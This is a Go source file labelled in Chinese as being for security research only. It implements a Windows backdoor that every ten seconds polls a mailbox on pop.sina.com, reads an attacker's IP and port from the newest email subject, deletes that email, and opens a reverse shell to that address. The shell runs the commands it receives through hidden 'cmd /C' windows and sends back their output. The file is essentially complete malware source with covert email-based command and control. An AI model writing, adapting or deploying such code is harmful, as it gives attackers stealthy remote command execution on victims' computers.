仅作安全研究
package main
import (
"os/exec"
"go-pop3"
"log"
"strings"
"net"
// "fmt"
"syscall"
"bufio"
"time"
)
//反弹shell函数
func reverseshell(addr string){
if c,_:=net.Dial("tcp", addr); c != nil {
for{
status, _ := bufio.NewReader(c).ReadString('\n');
//显示输入命令
// fmt.Println(status)
//输入exit命令退出
if status == "exit\n" {
break
}
//输入Ctrl+C时字符为空退出
if status == "" {
break
}
//执行命令返回结果
cmd := exec.Command("cmd", "/C", status)
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
out, _ := cmd.Output();
c.Write([]byte(out))
}
}
}
//获取Email中的地址并调用反弹shell函数
func Get_Address_to_Rverse_shell(username string, password string){
client, err := pop3.Dial("pop.sina.com:110")
if err != nil {
log.Fatalf("Error: %v\n", err)
}
defer func() {
client.Quit()
client.Close()
}()
if err = client.User(username); err != nil {
log.Printf("Error: %v\n", err)
return
}
if err = client.Pass(password); err != nil {
log.Printf("Error: %v\n", err)
return
}
var count int
var size uint64
if count, size, err = client.Stat(); err != nil {
log.Printf("Error: %v\n", err)
return
}
log.Printf("Count: %d, Size: %d\n", count, size)
var content string
if content, err = client.Retr(count); err != nil {
log.Printf("Error: %v\n", err)
return
}
if err = client.Dele(count); err != nil {
log.Printf("Error: %v\n", err)
return
}
if err = client.Noop(); err != nil {
log.Printf("Error: %v\n", err)
return
}
if err = client.Rset(); err != nil {
log.Printf("Error: %v\n", err)
return
}
//处理邮件object,获取地址
list := strings.Split(content, "\r\n")
for i := 0; i < len(list); i++ {
line := list[i]
if strings.Contains(line, "Subject:"){
addrlist := strings.Split(line, ":")
if len(addrlist) == 3 {
temp_addr := addrlist[1] + ":" + addrlist[2]
ADDR := strings.Replace(temp_addr, " ", "", -1)
reverseshell(ADDR)
// go reverseshell(ADDR)
}
}
}
}
func main(){
username := "xxx"
password := "xxx"
for{
Get_Address_to_Rverse_shell(username, password)
time.Sleep(10 * time.Second)
}
}
